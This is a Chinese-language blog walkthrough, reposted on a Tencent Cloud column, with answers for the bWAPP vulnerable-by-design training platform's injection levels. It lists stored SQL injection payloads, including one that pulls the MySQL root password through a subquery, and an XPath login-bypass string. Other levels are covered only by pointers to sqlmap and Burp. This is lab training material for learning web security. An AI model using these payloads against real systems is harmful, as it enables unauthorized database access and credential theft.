前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Bwapp漏洞平台答案全解-A1(第三篇)

Bwapp漏洞平台答案全解-A1(第三篇)

作者头像
用户1467662
发布2018-03-30 10:26:16
2.1K0
发布2018-03-30 10:26:16
举报
文章被收录于专栏:农夫安全

0x01 A1 - Injection(第三次)

1.21-SQL Injection - Stored (Blog)

代码语言:javascript
复制
输入:test','test')#
candy','candy')#
candy',(select password from mysql.user where user='root'limit 0,1))#
candy',(select version()))#
candy',(select user()))#

1.22-SQL Injection - Stored (SQLite)

用SQLmap的图形界面+burp抓包存成文件可以跑出来

-1.23-SQL Injection - Stored (User-Agent)

在User-Agent上有注入

使用sqlmap的 --risk --level 可以检测出

-1.24-SQL Injection - Stored (XML)

burp扫描出结果

-1.25-SQL Injection - Blind - Boolean-Based

SQL盲注-基于布尔

*1.26-SQL Injection - Blind - Time-Based

时间盲注,未做手工测试,可自行百度,

使用sqlmap可跑

-1.27-SQL Injection - Blind (SQLite)

SQL盲注-

-1.28-SQL Injection - Blind (WS/SOAP)

1.29-XML/XPath Injection (Login Form)

用户名:whatever' or 1=1 or'

绕过登陆

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-07-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.21-SQL Injection - Stored (Blog)
  • 1.22-SQL Injection - Stored (SQLite)
  • -1.23-SQL Injection - Stored (User-Agent)
  • -1.24-SQL Injection - Stored (XML)
  • -1.25-SQL Injection - Blind - Boolean-Based
  • *1.26-SQL Injection - Blind - Time-Based
  • -1.27-SQL Injection - Blind (SQLite)
  • -1.28-SQL Injection - Blind (WS/SOAP)
  • 1.29-XML/XPath Injection (Login Form)
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档